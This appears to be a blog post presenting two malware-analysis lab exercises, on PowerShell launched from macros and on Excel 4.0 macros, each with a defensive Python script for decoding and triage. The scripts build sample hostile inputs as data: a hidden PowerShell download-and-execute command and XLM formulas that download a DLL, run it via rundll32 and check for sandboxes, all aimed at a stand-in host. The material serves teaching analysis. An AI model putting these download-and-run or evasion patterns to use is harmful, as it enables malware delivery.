Malware Analysis Exercise – Living Off the Land with PowerShell

Threat actors commonly use living off the land (LOTL) techniques, such as launching PowerShell from macro code, to move from the initial document to the next stage of an attack. This lab shows how quick static analysis is often enough to extract the important IOCs. There may be several ways to answer the questions, but the focus of this exercise is on static analysis techniques. You can find the exercise, artifacts and full walk-through on my GitHub at https://github.com/jstrosch/malware-samples/tree/master/malware_analysis_exercises/2020/December. Looking for more of a challenge? Try this on CyberDefenders as part of their CTF: https://cyberdefenders.org/labs/51
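The static step this lab is built around, as an added Python example that is not code from the exercise or its walk-through: decode the base64/UTF-16LE argument of `-EncodedCommand`, unwrap the nested `FromBase64String('...')` layer that such scripts commonly carry, and pull URL and IP candidates out of the clear text. The command line and both script layers are constructed for this example (the hostname uses the reserved `.invalid` TLD), and the nested-layer pattern and IOC regexes are assumptions about typical samples, not details of the exercise's artifact.

```python
import base64
import re

# Constructed sample input for this example (not the exercise's artifact): the
# kind of command line a malicious macro hands to PowerShell. The second stage
# is wrapped in a nested base64 layer, as is common; example.invalid never resolves.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
INNER_SCRIPT = (
    "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + base64.b64encode(STAGE2.encode("utf-8")).decode("ascii")
    + "')))"
)
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand "
    + base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode("ascii")
)

# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -enc); its argument is
# base64 of the script encoded as UTF-16LE. Switches such as -Exec are not followed
# directly by whitespace after the "-E", so they do not match.
ENC_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Second-layer blobs the script unpacks at runtime (assumed pattern).
NESTED_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def _b64(blob: str) -> bytes:
    # Pad to a multiple of four so truncated or unpadded blobs still decode.
    return base64.b64decode(blob + "=" * (-len(blob) % 4))


def _bytes_to_text(raw: bytes) -> str:
    # UTF-16LE text of ASCII characters has a NUL in every odd byte; otherwise assume UTF-8.
    if len(raw) >= 2 and raw[1::2].count(0) >= len(raw[1::2]) // 2:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_encoded_command(cmdline: str) -> str:
    """Return the clear-text script behind -EncodedCommand, or "" if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    return _b64(m.group(1)).decode("utf-16-le", errors="replace")


def unwrap_layers(script: str, max_depth: int = 5) -> list:
    """Return the script followed by every nested FromBase64String payload, decoded."""
    layers, frontier = [script], [script]
    for _ in range(max_depth):  # bounded so a self-referential blob cannot loop forever
        found = []
        for text in frontier:
            for blob in NESTED_B64.findall(text):
                try:
                    found.append(_bytes_to_text(_b64(blob)))
                except ValueError:  # binascii.Error is a ValueError: skip junk blobs
                    continue
        if not found:
            break
        layers.extend(found)
        frontier = found
    return layers


def extract_iocs(text: str) -> dict:
    """Pull URLs and IPv4-looking candidates out of decoded script text."""
    return {
        "urls": sorted(set(URL_RE.findall(text))),
        "ipv4": sorted(set(IPV4_RE.findall(text))),
    }


def analyze(cmdline: str) -> dict:
    # A clear-text -Command line has no encoded argument; analyze it as-is.
    script = decode_encoded_command(cmdline) or cmdline
    layers = unwrap_layers(script)
    return {"layers": layers, "iocs": extract_iocs("\n".join(layers))}


if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    for i, layer in enumerate(result["layers"]):
        print(f"--- layer {i} ---\n{layer}")
    print(result["iocs"])
```

Everything here is string handling; nothing is executed, which is the point of doing this statically. The IPv4 regex only yields candidates (version numbers match it too), so review what it returns before treating a hit as an IOC.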


Malware Analysis Exercise – Getting Started with Excel 4 Macros

Recently we have seen a resurgence of malicious Excel documents. Instead of VBA macros, however, they use the older-style Excel 4.0 (XLM) macros. This changes the approach to analyzing these documents and requires a slightly different set of tools. In this challenge you will get hands-on with two documents that use Excel 4.0 macros to perform anti-analysis checks and download the next stage of the attack. You can find the exercise, artifacts and full walk-through on my GitHub at https://github.com/jstrosch/malware-samples/tree/master/malware_analysis_exercises/2021/February. Looking for more of a challenge? Try this on CyberDefenders as part of their CTF: https://cyberdefenders.org/labs/55
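Once a tool has dumped the formulas from the macro sheet, the remaining static work is usually deobfuscation and triage. The following is an added Python example, not code from the exercise or its walk-through: it folds the `CHAR(n)&CHAR(n)&...` concatenation that XLM droppers often use to hide strings, then flags formulas that call suspicious Excel 4.0 functions (process execution, Win32 API calls, `GET.WORKSPACE` environment probes used as anti-analysis) or contain URLs. The formulas, URL and paths are constructed for this example and the specific obfuscation style is an assumption about typical samples, not a description of the two documents in the challenge.

```python
import re

URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)
CHAR_RE = re.compile(r"CHAR\((\d{1,3})\)", re.IGNORECASE)
CONCAT_RE = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')

# Excel 4.0 functions worth a second look, matched as NAME( so that e.g.
# "DllRegisterServer" inside a string does not trip the REGISTER check, plus
# Win32 API names that appear as string arguments to CALL/REGISTER.
XLM_FUNCS = {
    "EXEC": "starts a process",
    "CALL": "calls a Win32 API",
    "REGISTER": "imports a Win32 API",
    "FORMULA": "writes formulas at runtime (self-modifying sheet)",
    "GET.WORKSPACE": "probes the environment (sandbox/analyst detection)",
}
API_NAMES = {"URLDownloadToFileA": "downloads a file to disk"}


def _chars(s: str) -> str:
    """Encode a string the way obfuscated XLM does: CHAR(n)&CHAR(n)&..."""
    return "&".join(f"CHAR({ord(c)})" for c in s)


# Constructed sample input for this example: cell formulas in the form a dumper
# such as olevba prints them. The URL and paths are made up; .invalid never resolves.
SAMPLE_FORMULAS = [
    "=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",  # quit if no mouse is present
    "=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",  # quit if the host cannot play sound
    '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
    + _chars("http://example.invalid/a.dll")
    + ',"C:\\Users\\Public\\a.dll",0,0)',
    "=EXEC(" + _chars("rundll32 C:\\Users\\Public\\a.dll,DllRegisterServer") + ")",
    "=HALT()",
]


def fold_char_concat(formula: str) -> str:
    """Replace CHAR(n) with its character and merge "a"&"b" runs into "ab".

    CHAR(34) (a double quote) is left as a bare quote and can break merging;
    real samples rarely need it, so it is not special-cased here.
    """
    s = CHAR_RE.sub(lambda m: '"' + chr(int(m.group(1))) + '"', formula)
    prev = None
    while prev != s:  # repeat until no adjacent quoted pieces remain
        prev = s
        s = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', s)
    return s


def triage(formulas: list) -> list:
    """Deobfuscate each formula and report those carrying suspicious functions or URLs."""
    findings = []
    for formula in formulas:
        clear = fold_char_concat(formula)
        tags = [n for n in XLM_FUNCS
                if re.search(r"\b" + re.escape(n) + r"\(", clear, re.IGNORECASE)]
        tags += [n for n in API_NAMES if n.lower() in clear.lower()]
        urls = URL_RE.findall(clear)
        if tags or urls:
            findings.append({"formula": clear, "tags": tags, "urls": urls})
    return findings


if __name__ == "__main__":
    for hit in triage(SAMPLE_FORMULAS):
        print(hit["tags"], hit["urls"])
        print("   ", hit["formula"])
```

The `GET.WORKSPACE` lines are the anti-analysis part: the sheet closes itself unless the host looks like a real workstation, so an emulator or sandbox that does not answer those probes convincingly never reaches the download. Seeing them in the dump is itself a useful indicator.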
